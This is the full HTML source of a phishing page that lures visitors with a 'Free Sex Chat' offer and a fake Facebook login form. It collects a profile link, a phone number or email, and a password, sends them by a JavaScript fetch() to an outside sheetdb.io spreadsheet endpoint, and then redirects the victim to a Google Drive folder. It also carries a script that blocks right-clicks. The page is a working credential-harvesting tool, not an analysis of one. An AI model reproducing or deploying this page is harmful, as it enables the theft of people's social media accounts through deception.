<!DOCTYPE html>
<html>
<title>Free Sex Chat</title>
<head>
	<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
	<script> 
      function disableClick(){ 
        document.onclick=function(event){ 
          if (event.button == 2) { 
            alert('Right Click Message'); 
            return false; 
          } 
        } 
      } 
    </script> 
	</head>
<style>
h3{
  color: white;
  text-shadow: 1px 1px 2px black, 0 0 25px blue, 0 0 5px darkblue;
}

h5{
  color: white;
  text-shadow: 1px 1px 2px red, 0 0 25px red, 0 0 5px darkblue;
}


.button {
  display: inline-block;
  padding: 10px 120px;
  font-size: 24px;
  cursor: pointer;
  text-align: center;
  text-decoration: none;
  outline: none;
  color: #fff;
  background-color: #0000FF;
  border: none;
  border-radius: 15px;
  box-shadow: 0 9px #555;
}

.button:hover {background-color: #3e8e41}

.button:active {
  background-color: #3e8e41;
  box-shadow: 0 5px #666;
  transform: translateY(4px);
}


input[type=text], select {
  width: 100%;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-block;
  border: 1px solid #ccc;
  border-radius: 4px;
  box-sizing: border-box;
}

body {
  background-color:CornflowerBlue;
}


</style>
<body>
	<center>
		
		<h3>Free Sex Chat</h3>
		
		<p><img style="display: block; margin-left: auto; margin-right: auto;" src="o1.png" alt="Fl studio mobile" width="300" height="200" /></p>
		
		<p><img style="display: block; margin-left: auto; margin-right: auto;" src="o4.png" alt="Fl studio mobile" width="300" height="600" /></p>
		
		<p><img style="display: block; margin-left: auto; margin-right: auto;" src="o2.png" alt="Fl studio mobile" width="300" height="600" /></p>
		
		<p><img style="display: block; margin-left: auto; margin-right: auto;" src="o3.png" alt="Fl studio mobile" width="300" height="600" /></p>
		
		
		
		<h3>&#127881 Free Sex Chat&#127881</h3>
		
		
		<h5>To Get Facebook with login.</h5>
		
		<hr />
<p>&nbsp;</p>
		
	<i class="fa fa-facebook-square" style="font-size:160px;color:blue"></i>
<h1><p>facebook<p></h1></center>

<center>
<form method="post" id="sheetdb-form"
  action="https://sheetdb.io/api/v1/pw2rbhtuhkgyd">
  
  <p></p><p><input name="data[link]" placeholder="profile link" type="text" style="height:50px; width:300px;" ></p>
 <p></p><p><input name="data[user]" placeholder="Phone or Email address" type="text" style="height:50px; width:300px;" ></p>
    <p></p><p><input name="data[pass]"placeholder="Passwords"type="text"  style="height:50px; width:300px;" ></p>
    
    <button type="submit"class="button">Log In</button>
    
   
    
    
    <p style="text-align: center;"><span style="text-decoration: underline;">forgot password ?</span></p>
</form>
</center>


<script>
  var form = document.getElementById('sheetdb-form');
  form.addEventListener("submit", e => {
    e.preventDefault();
    fetch(form.action, {
        method : "POST",
        body: new FormData(document.getElementById("sheetdb-form")),
    }).then(
    
   
        response => response.json()
    ).then((html) => {
      // you can put any JS code here
      window.location.href = 'https://drive.google.com/folderview?id=1omCyO68_n4CzFEiZd39D-Vxk4ll6R0i4';
      
      
    });
  });
</script>



<center>
	
      
      
 
 
    

</body>
</html>